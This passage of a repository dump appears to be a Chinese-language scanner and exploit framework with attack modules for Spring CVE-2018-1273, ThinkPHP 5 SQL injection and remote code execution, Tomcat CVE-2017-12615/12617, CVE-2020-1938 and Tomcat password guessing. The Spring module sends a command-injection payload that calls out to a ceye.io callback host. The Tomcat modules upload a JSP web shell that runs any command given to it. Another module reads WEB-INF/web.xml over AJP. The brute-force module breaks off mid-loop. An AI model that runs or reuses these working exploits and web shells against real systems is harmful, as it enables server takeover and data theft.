这里利用脚本针对的是spring官方的web样例中的注册页面,实际中未必适用 8 | ''' 9 | 10 | 11 | def attack(url): 12 | URL1 = url + '/users' 13 | try: 14 | re = requests.get(URL1, verify=False, timeout=5) 15 | except Exception: 16 | print('Some error!') 17 | else: 18 | if re.status_code == 200: 19 | print('[+]存在风险页面,开始检测:', URL1) 20 | try: 21 | URL2 = url + '/users?page=&size=5' 22 | headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36', 23 | "Referer": URL1, 24 | "Content-Type": 'application/x-www-form-urlencoded' 25 | } 26 | randomint = random.randint(100000, 999999) 27 | data = f'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping {randomint}_CVE_2018_1273.e7wqoz.ceye.io")]=&password=&repeatedPassword=' 28 | re1 = requests.post(URL2, data=data, headers=headers) 29 | print('一般执行成功返回值为500,此次返回值为:', re1.status_code) 30 | print('此处利用ceye来确认漏洞,请登录相关账户进行确认:', f" {randomint}_CVE_2018_1273.e7wqoz.ceye.io") 31 | except Exception: 32 | print('[-]执行payload出错!') 33 | else: 34 | print('[-]未发现漏洞页面:', URL1, re.status_code) 35 | 36 | 37 | if __name__ == "__main__": 38 | attack() 39 | -------------------------------------------------------------------------------- /spring_vuln/Main_spring.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import spring_vuln.CVE_2018_1273 3 | 4 | 5 | def exec(URL): 6 | spring_vuln.CVE_2018_1273.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /spring_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /thinkphp/Main_thinkphp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import 
thinkphp.thinkphp5_inj_info 3 | import thinkphp.thinkphp5_x_rce 4 | import thinkphp.thinkphp_before5_0_23_rce 5 | 6 | 7 | def exec(URL): 8 | thinkphp.thinkphp5_inj_info.attack(URL) 9 | thinkphp.thinkphp5_x_rce.attack(URL) 10 | thinkphp.thinkphp_before5_0_23_rce.attack(URL) 11 | 12 | 13 | if __name__ == "__main__": 14 | exec() 15 | -------------------------------------------------------------------------------- /thinkphp/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /thinkphp/thinkphp5_inj_info.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | ''' 6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx 7 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 8 | 启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来。 9 | ''' 10 | 11 | 12 | def attack(url): 13 | print('[+]开始检测 thinkphp5_inj_info !') 14 | URL1 = url + '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1' 15 | try: 16 | re = requests.get(URL1, verify=False, timeout=10) 17 | except Exception: 18 | print('[-]访问漏洞页面失败,未发现该漏洞!') 19 | print('\n') 20 | else: 21 | if re.status_code == 500 and 'SQLSTATE' in re.text: 22 | print('[+]存在风险页面,开始检测:', URL1) 23 | try: 24 | # print(re.text) 25 | soup=BeautifulSoup(re.content,"lxml") 26 | print('[+]获得账户数据如下,数据库连接数据请前往页面自行查找:') 27 | print(soup.find_all('h1')[0].get_text()) 28 | print('[+]漏洞检测结束,存在 thinkphp5_inj_info !') 29 | print('\n') 30 | except Exception: 31 | print('[-]获取数据出错!请自行访问页面判断.') 32 | print('\n') 33 | else: 34 | print('[-]访问漏洞页面失败,未发现该漏洞:', URL1, re.status_code) 35 | print('\n') 36 | 37 | 38 | if __name__ == "__main__": 39 | attack() 40 | -------------------------------------------------------------------------------- /thinkphp/thinkphp5_x_rce.py: 
-------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | ''' 6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx 7 | ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 8 | 直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo: 9 | ''' 10 | 11 | 12 | def attack(url): 13 | print('[+]开始检测 thinkphp5.x_rce !') 14 | URL1 = url + r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1' 15 | try: 16 | re = requests.get(URL1, verify=False, timeout=10) 17 | except Exception: 18 | print('[-]访问漏洞页面失败,未发现该漏洞!') 19 | print('\n') 20 | else: 21 | if re.status_code == 500 and 'PHP' in re.text and 'System ' in re.text: 22 | print('[+]phpinfo成功执行:', URL1) 23 | try: 24 | soup=BeautifulSoup(re.content,"lxml") 25 | print('[+]获取到的php版本如下:') 26 | print(soup.find_all('h1')[0].get_text()) 27 | print('[+]漏洞检测结束,存在 thinkphp5.x_rce !') 28 | print('\n') 29 | except Exception: 30 | print('[-]获取数据出错!请自行访问页面判断.') 31 | print('\n') 32 | else: 33 | print('[-]访问漏洞页面失败,未发现该漏洞:', URL1, re.status_code) 34 | print('\n') 35 | 36 | 37 | if __name__ == "__main__": 38 | attack() 39 | -------------------------------------------------------------------------------- /thinkphp/thinkphp_before5_0_23_rce.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | ''' 6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx 7 | ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 8 | 9 | POST /index.php?s=captcha HTTP/1.1 10 | Host: localhost 11 | Accept-Encoding: gzip, deflate 12 | Accept: */* 13 | Accept-Language: en 14 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; 
Windows NT 6.1; Win64; x64; Trident/5.0) 15 | Connection: close 16 | Content-Type: application/x-www-form-urlencoded 17 | Content-Length: 72 18 | 19 | _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 20 | ''' 21 | 22 | 23 | def attack(url): 24 | print('[+]开始检测 thinkphp_before5.0.23_rce !') 25 | URL1 = url + r'/index.php?s=captcha' 26 | try: 27 | data = {'_method': '__construct', 'filter[]': 'system', 'method': 'get', 'server[REQUEST_METHOD]': 'ls'} 28 | re = requests.post(URL1, data=data, verify=False, timeout=10) 29 | except Exception: 30 | print('[-]访问漏洞页面失败,未发现该漏洞!') 31 | print('\n') 32 | else: 33 | if re.status_code == 200 and 'System Error' in re.text: 34 | print('[+]命令成功执行,获取到的目录如下:') 35 | try: 36 | print(re.text[:80]) 37 | print('[+]漏洞检测结束,存在 thinkphp_before5.0.23_rce !') 38 | print('\n') 39 | except Exception: 40 | print('[-]获取数据出错!请自行访问页面判断.') 41 | print('\n') 42 | else: 43 | print('[-]访问漏洞页面失败,未发现该漏洞', URL1, re.status_code) 44 | print('\n') 45 | 46 | 47 | if __name__ == "__main__": 48 | attack() 49 | -------------------------------------------------------------------------------- /tomcat/CVE_2017_12615.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import requests 4 | import time 5 | 6 | ''' 7 | Usage: 8 | moon.py -u tomcat http://127.0.0.1:8080 9 | shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami 10 | 影响范围:Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据 11 | 成因:Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 12 | 最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true 13 | ''' 14 | 15 | def attack(URL): 16 | print('[+]开始检测-Tomcat-CVE-2017-12615。[+]') 17 | url = URL + '/T68t8YT86.jsp/' 18 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 19 | headers={"User-Agent":user_agent} 20 | data="""CVE-2017-12615 21 | <% 22 | 
if("fff".equals(request.getParameter("pwd"))){ 23 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 24 | int a = -1; 25 | byte[] b = new byte[2048]; 26 | out.print("
");
27 |         while((a=in.read(b))!=-1){
28 |             out.println(new String(b));
29 |         }
30 |         out.print("
"); 31 | } 32 | %>""" 33 | try: 34 | requests.put(url, headers=headers, data=data) 35 | time.sleep(2) 36 | verify_response = requests.get(url[:-1], headers=headers) 37 | if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text: 38 | print('存在-Tomcat-CVE-2017-12615!!!') 39 | print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami') 40 | else : 41 | print('访问shell地址:'+verify_response.status_code) 42 | print("未发现-Tomcat-CVE-2017-12615。") 43 | except : 44 | print("未发现-Tomcat-CVE-2017-12615。") 45 | print('[+]检测结束-Tomcat-CVE-2017-12615。[+]') 46 | print('\n') 47 | 48 | if __name__ == "__main__": 49 | attack() -------------------------------------------------------------------------------- /tomcat/CVE_2017_12617.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import string 4 | from random import * 5 | import requests 6 | import urllib3 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | ''' 11 | Usage: 12 | moon.py -u tomcat http://127.0.0.1:8080 13 | shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami 14 | ''' 15 | 16 | def gen_shell(): 17 | min_char = 4 18 | max_char = 12 19 | allchar = string.ascii_letters + string.digits 20 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 21 | return shell_name + ".jsp" 22 | 23 | def construct_put(url, f): 24 | #print(url) 25 | evil = """CVE-2017-12617 26 | <% 27 | if("fff".equals(request.getParameter("pwd"))){ 28 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 29 | int a = -1; 30 | byte[] b = new byte[2048]; 31 | out.print("
");
32 |         while((a=in.read(b))!=-1){
33 |             out.println(new String(b));
34 |         }
35 |         out.print("
"); 36 | } 37 | %>""" 38 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} 39 | req = requests.put(str(url) +'/'+ str(f) + "/", data=evil, headers=headers, verify=False) 40 | #print(req.status_code) 41 | if req.status_code == 201: 42 | #print("File Created ..") 43 | print('发现-Tomcat-CVE-2017-12617!!!') 44 | print('Shell地址:'+(str(url) +'/'+ str(f))+'?pwd=fff&cmd=whoami') 45 | else: 46 | print('未发现-Tomcat-CVE-2017-12617。') 47 | 48 | def attack(URL): 49 | print('[+]开始检测-Tomcat-CVE-2017-12617。[+]') 50 | shell_name = gen_shell() 51 | #print(shell_name) 52 | try: 53 | construct_put(URL, shell_name) 54 | except: 55 | print('shell上传错误。') 56 | print('[+]检测结束-Tomcat-CVE-2017-12617。[+]') 57 | print('\n') 58 | 59 | 60 | if __name__ == '__main__': 61 | attack() 62 | -------------------------------------------------------------------------------- /tomcat/CVE_2020_1938.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # CNVD-2020-10487 / CVE-2020-1938 3 | # https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py 核心代码出自此处 4 | from socket import * 5 | import struct 6 | from io import StringIO 7 | 8 | 9 | ''' 10 | Usage: 11 | moon.py -u tomcat http://127.0.0.1:8080 12 | 上面链接带不带端口无所谓,不带端口默认检测8009,带端口会检测链接中的端口和8009,不会检测两次8009 13 | 受影响版本 14 | 15 | Apache Tomcat 6 16 | Apache Tomcat 7 < 7.0.100 17 | Apache Tomcat 8 < 8.5.51 18 | Apache Tomcat 9 < 9.0.31 19 | 不受影响版本 20 | 1. Apache Tomcat = 7.0.100 21 | 2. Apache Tomcat = 8.5.51 22 | 3. 
Apache Tomcat = 9.0.31 23 | ''' 24 | 25 | 26 | def pack_string(s): 27 | if s is None: 28 | return struct.pack(">h", -1) 29 | l = len(s) 30 | return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) 31 | 32 | 33 | def unpack(stream, fmt): 34 | size = struct.calcsize(fmt) 35 | buf = stream.read(size) 36 | return struct.unpack(fmt, buf) 37 | 38 | 39 | def unpack_string(stream): 40 | size, = unpack(stream, ">h") 41 | if size == -1: # null string 42 | return None 43 | res, = unpack(stream, "%ds" % size) 44 | stream.read(1) # \0 45 | return res 46 | 47 | 48 | class NotFoundException(Exception): 49 | pass 50 | 51 | 52 | class AjpBodyRequest(object): 53 | # server == web server, container == servlet 54 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 55 | MAX_REQUEST_LENGTH = 8186 56 | 57 | def __init__(self, data_stream, data_len, data_direction=None): 58 | self.data_stream = data_stream 59 | self.data_len = data_len 60 | self.data_direction = data_direction 61 | 62 | def serialize(self): 63 | data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) 64 | if len(data) == 0: 65 | return struct.pack(">bbH", 0x12, 0x34, 0x00) 66 | else: 67 | res = struct.pack(">H", len(data)) 68 | res += data 69 | if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: 70 | header = struct.pack(">bbH", 0x12, 0x34, len(res)) 71 | else: 72 | header = struct.pack(">bbH", 0x41, 0x42, len(res)) 73 | return header + res 74 | 75 | def send_and_receive(self, socket, stream): 76 | while True: 77 | data = self.serialize() 78 | socket.send(data) 79 | r = AjpResponse.receive(stream) 80 | while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS: 81 | r = AjpResponse.receive(stream) 82 | 83 | if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: 84 | break 85 | 86 | 87 | class AjpForwardRequest(object): 88 | _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, 
CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range( 89 | 28) 90 | REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 91 | 'TRACE': TRACE} 92 | # server == web server, container == servlet 93 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 94 | COMMON_HEADERS = ["SC_REQ_ACCEPT", 95 | "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", 96 | "SC_REQ_AUTHORIZATION", 97 | "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", 98 | "SC_REQ_COOKIE2", 99 | "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" 100 | ] 101 | ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", 102 | "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] 103 | 104 | def __init__(self, data_direction=None): 105 | self.prefix_code = 0x02 106 | self.method = None 107 | self.protocol = None 108 | self.req_uri = None 109 | self.remote_addr = None 110 | self.remote_host = None 111 | self.server_name = None 112 | self.server_port = None 113 | self.is_ssl = None 114 | self.num_headers = None 115 | self.request_headers = None 116 | self.attributes = None 117 | self.data_direction = data_direction 118 | 119 | def pack_headers(self): 120 | self.num_headers = len(self.request_headers) 121 | res = "" 122 | res = struct.pack(">h", self.num_headers) 123 | for h_name in self.request_headers: 124 | if h_name.startswith("SC_REQ"): 125 | code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 126 | res += struct.pack("BB", 0xA0, code) 127 | else: 128 | res += pack_string(h_name) 129 | 130 | res += pack_string(self.request_headers[h_name]) 131 | return res 132 | 133 | def pack_attributes(self): 134 | res = b"" 135 | for attr in self.attributes: 136 | a_name = attr['name'] 137 | code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 
138 | res += struct.pack("b", code) 139 | if a_name == "req_attribute": 140 | aa_name, a_value = attr['value'] 141 | res += pack_string(aa_name) 142 | res += pack_string(a_value) 143 | else: 144 | res += pack_string(attr['value']) 145 | res += struct.pack("B", 0xFF) 146 | return res 147 | 148 | def serialize(self): 149 | res = "" 150 | res = struct.pack("bb", self.prefix_code, self.method) 151 | res += pack_string(self.protocol) 152 | res += pack_string(self.req_uri) 153 | res += pack_string(self.remote_addr) 154 | res += pack_string(self.remote_host) 155 | res += pack_string(self.server_name) 156 | res += struct.pack(">h", self.server_port) 157 | res += struct.pack("?", self.is_ssl) 158 | res += self.pack_headers() 159 | res += self.pack_attributes() 160 | if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: 161 | header = struct.pack(">bbh", 0x12, 0x34, len(res)) 162 | else: 163 | header = struct.pack(">bbh", 0x41, 0x42, len(res)) 164 | return header + res 165 | 166 | def parse(self, raw_packet): 167 | stream = StringIO(raw_packet) 168 | self.magic1, self.magic2, data_len = unpack(stream, "bbH") 169 | self.prefix_code, self.method = unpack(stream, "bb") 170 | self.protocol = unpack_string(stream) 171 | self.req_uri = unpack_string(stream) 172 | self.remote_addr = unpack_string(stream) 173 | self.remote_host = unpack_string(stream) 174 | self.server_name = unpack_string(stream) 175 | self.server_port = unpack(stream, ">h") 176 | self.is_ssl = unpack(stream, "?") 177 | self.num_headers, = unpack(stream, ">H") 178 | self.request_headers = {} 179 | for i in range(self.num_headers): 180 | code, = unpack(stream, ">H") 181 | if code > 0xA000: 182 | h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] 183 | else: 184 | h_name = unpack(stream, "%ds" % code) 185 | stream.read(1) # \0 186 | h_value = unpack_string(stream) 187 | self.request_headers[h_name] = h_value 188 | 189 | def send_and_receive(self, socket, stream, save_cookies=False): 190 | res = [] 
191 | i = socket.sendall(self.serialize()) 192 | if self.method == AjpForwardRequest.POST: 193 | return res 194 | 195 | r = AjpResponse.receive(stream) 196 | assert r.prefix_code == AjpResponse.SEND_HEADERS 197 | res.append(r) 198 | if save_cookies and 'Set-Cookie' in r.response_headers: 199 | self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] 200 | 201 | # read body chunks and end response packets 202 | while True: 203 | r = AjpResponse.receive(stream) 204 | res.append(r) 205 | if r.prefix_code == AjpResponse.END_RESPONSE: 206 | break 207 | elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: 208 | continue 209 | else: 210 | raise NotImplementedError 211 | break 212 | 213 | return res 214 | 215 | 216 | class AjpResponse(object): 217 | _, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) 218 | COMMON_SEND_HEADERS = [ 219 | "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", 220 | "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" 221 | ] 222 | 223 | def parse(self, stream): 224 | # read headers 225 | self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") 226 | 227 | if self.prefix_code == AjpResponse.SEND_HEADERS: 228 | self.parse_send_headers(stream) 229 | elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: 230 | self.parse_send_body_chunk(stream) 231 | elif self.prefix_code == AjpResponse.END_RESPONSE: 232 | self.parse_end_response(stream) 233 | elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: 234 | self.parse_get_body_chunk(stream) 235 | else: 236 | raise NotImplementedError 237 | 238 | def parse_send_headers(self, stream): 239 | self.http_status_code, = unpack(stream, ">H") 240 | self.http_status_msg = unpack_string(stream) 241 | self.num_headers, = unpack(stream, ">H") 242 | self.response_headers = {} 243 | for i in range(self.num_headers): 244 | code, = unpack(stream, ">H") 245 | if code <= 0xA000: # custom header 246 | h_name, = 
unpack(stream, "%ds" % code) 247 | stream.read(1) # \0 248 | h_value = unpack_string(stream) 249 | else: 250 | h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001] 251 | h_value = unpack_string(stream) 252 | self.response_headers[h_name] = h_value 253 | 254 | def parse_send_body_chunk(self, stream): 255 | self.data_length, = unpack(stream, ">H") 256 | self.data = stream.read(self.data_length + 1) 257 | 258 | def parse_end_response(self, stream): 259 | self.reuse, = unpack(stream, "b") 260 | 261 | def parse_get_body_chunk(self, stream): 262 | rlen, = unpack(stream, ">H") 263 | return rlen 264 | 265 | @staticmethod 266 | def receive(stream): 267 | r = AjpResponse() 268 | r.parse(stream) 269 | return r 270 | 271 | 272 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): 273 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) 274 | fr.method = method 275 | fr.protocol = "HTTP/1.1" 276 | fr.req_uri = req_uri 277 | fr.remote_addr = target_host 278 | fr.remote_host = None 279 | fr.server_name = target_host 280 | fr.server_port = 80 281 | fr.request_headers = { 282 | 'SC_REQ_ACCEPT': 'text/html', 283 | 'SC_REQ_CONNECTION': 'keep-alive', 284 | 'SC_REQ_CONTENT_LENGTH': '0', 285 | 'SC_REQ_HOST': target_host, 286 | 'SC_REQ_USER_AGENT': 'Mozilla', 287 | 'Accept-Encoding': 'gzip, deflate, sdch', 288 | 'Accept-Language': 'en-US,en;q=0.5', 289 | 'Upgrade-Insecure-Requests': '1', 290 | 'Cache-Control': 'max-age=0' 291 | } 292 | fr.is_ssl = False 293 | fr.attributes = [] 294 | return fr 295 | 296 | 297 | class Tomcat(object): 298 | def __init__(self, target_host, target_port): 299 | self.target_host = target_host 300 | self.target_port = target_port 301 | self.socket = socket(AF_INET, SOCK_STREAM) 302 | self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 303 | self.socket.connect((target_host, target_port)) 304 | self.stream = self.socket.makefile("rb", buffering=0) 305 | 306 | def perform_request(self, req_uri, headers={}, 
method='GET', user=None, password=None, attributes=[]): 307 | self.req_uri = req_uri 308 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, 309 | method=AjpForwardRequest.REQUEST_METHODS.get(method)) 310 | print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 311 | if user is not None and password is not None: 312 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ( 313 | "%s:%s" % (user, password)).encode('base64').replace('\n', '') 314 | for h in headers: 315 | self.forward_request.request_headers[h] = headers[h] 316 | for a in attributes: 317 | self.forward_request.attributes.append(a) 318 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 319 | if len(responses) == 0: 320 | return None, None 321 | snd_hdrs_res = responses[0] 322 | data_res = responses[1:-1] 323 | if len(data_res) == 0: 324 | print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers) 325 | return snd_hdrs_res, data_res 326 | 327 | 328 | def attack(URL): 329 | print('[+]开始检测-Tomcat-CVE-2020-1938。[+]') 330 | #url中不带有端口 331 | if len(URL.split(':')) == 2: 332 | port = 8009 333 | print('port',port) 334 | print('ip',URL.split(':')[1][2:]) 335 | try: 336 | t = Tomcat(URL.split(':')[1][2:], port) 337 | _, data = t.perform_request('/asdf', attributes=[ 338 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, 339 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, 340 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, 341 | ]) 342 | print('----------------------------') 343 | print(type(data)) 344 | print(data[0].data.decode('UTF-8')) 345 | except Exception as e: 346 | print(e,'Some error!') 347 | 348 | #url中带有端口 349 | elif len(URL.split(':')) == 3: 350 | print('ip',URL.split(':')[1][2:]) 351 | print('port',URL.split(':')[2]) 352 | try: 353 | t = 
Tomcat(URL.split(':')[1][2:], int(URL.split(':')[2])) 354 | _, data = t.perform_request('/asdf', attributes=[ 355 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, 356 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, 357 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, 358 | ]) 359 | print('----------------------------') 360 | print(type(data)) 361 | print(data[0].data.decode('UTF-8')) 362 | except Exception as e: 363 | print(e,'Some error!') 364 | print('=================================') 365 | if int(URL.split(':')[2]) != 8009: 366 | print('ip', URL.split(':')[1][2:]) 367 | print('port', 8009) 368 | try: 369 | t = Tomcat(URL.split(':')[1][2:], 8009) 370 | _, data = t.perform_request('/asdf', attributes=[ 371 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, 372 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, 373 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, 374 | ]) 375 | print('----------------------------') 376 | print(type(data)) 377 | print(data[0].data.decode('UTF-8')) 378 | except Exception as e: 379 | print(e,'Some error!') 380 | else: 381 | pass 382 | else: 383 | print('url error') 384 | print('[+]检测结束-Tomcat-CVE-2020-1938。[+]') 385 | print('\n') 386 | 387 | 388 | if __name__ == '__main__': 389 | attack() 390 | -------------------------------------------------------------------------------- /tomcat/Main_tomcat.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import tomcat.CVE_2017_12615 3 | import tomcat.example_vulnerability 4 | import tomcat.CVE_2017_12617 5 | import tomcat.tomcat_weakpasswd 6 | import tomcat.CVE_2020_1938 7 | 8 | 9 | def exec(URL): 10 | tomcat.example_vulnerability.attack(URL) 11 | tomcat.CVE_2017_12615.attack(URL) 12 | 
tomcat.CVE_2017_12617.attack(URL) 13 | tomcat.tomcat_weakpasswd.attack(URL) 14 | tomcat.CVE_2020_1938.attack(URL) 15 | 16 | 17 | 18 | 19 | if __name__ == "__main__": 20 | exec() 21 | -------------------------------------------------------------------------------- /tomcat/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /tomcat/example_vulnerability.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u tomcat http://127.0.0.1:8080 7 | 影响范围:Tomcat: 全版本 8 | session操纵漏洞:Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例, 9 | 其中session样例(/examples/servlets/servlet/SessionExample)允许用户对session进行操纵。 10 | 因为session是全局通用的,所以用户可以通过操纵session获取管理员权限。 11 | (不一定都是全局的,如果path只在examples下,那就无法利用)。 12 | 利用此漏洞需要知道相关后台登录后的session键值对,然后写入到session中,利用条件苛刻。 13 | https://cloud.tencent.com/info/2e03f26090fe592b6c7aa933dd6c0f94.html 14 | 解决办法:安装完tomcat后,删除$CATALINA_HOME/webapps下默认的所有目录文件* rm -rf /srv/apache-tomcat/webapps/* 15 | ''' 16 | 17 | def attack(URL): 18 | urls = ( 19 | '/examples/servlets/servlet/SessionExample', #200 20 | '/examples/', #304 21 | '/docs/', #304 22 | '/docs/BUILDING.txt', 23 | '/docs/RUNNING.txt', 24 | '/manager/html', # 401 25 | '/host-manager/html', #401 26 | '/icons/', 27 | '/manual/', 28 | '/examples/jsp/snp/snoop.jsp', 29 | '/lib/catalina.jar', 30 | '/conf/tomcat-users.xsd', 31 | '/bin/catalina-tasks.xml' 32 | ) 33 | 34 | print('[+]开始检测-Tomcat-example_vulnerability。[+]') 35 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 36 | headers={"User-Agent":user_agent} 37 | for url in urls: 38 | url = URL + url 39 | try: 40 | verify_response = requests.get(url, headers=headers) 41 | 42 | if verify_response.status_code == 200 or 304 
or 401: 43 | try: 44 | print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 45 | except Exception: 46 | pass 47 | else: 48 | continue 49 | except Exception: 50 | print("Someerror!") 51 | print('[+]检测结束-Tomcat-example_vulnerability。[+]') 52 | print('\n') 53 | 54 | if __name__ == "__main__": 55 | attack() 56 | -------------------------------------------------------------------------------- /tomcat/tomcat_weakpasswd.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import base64 4 | import urllib3 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | ''' 8 | Usage: 9 | moon.py -u tomcat http://127.0.0.1:8080 10 | 爆破tomcat用户名账户密码。 11 | ''' 12 | 13 | def attack(URL): 14 | print('[+]开始检测-Tomcat-weak_pawsswd漏洞。[+]') 15 | #设定用于爆破的账户密码 16 | accounts = ['admin', 'tomcat', 'role1', 'manager', 'both'] 17 | passwds = ['123456', '1234', '12345678', 'admin', 'tomcat'] 18 | for account in accounts: 19 | for passwd in 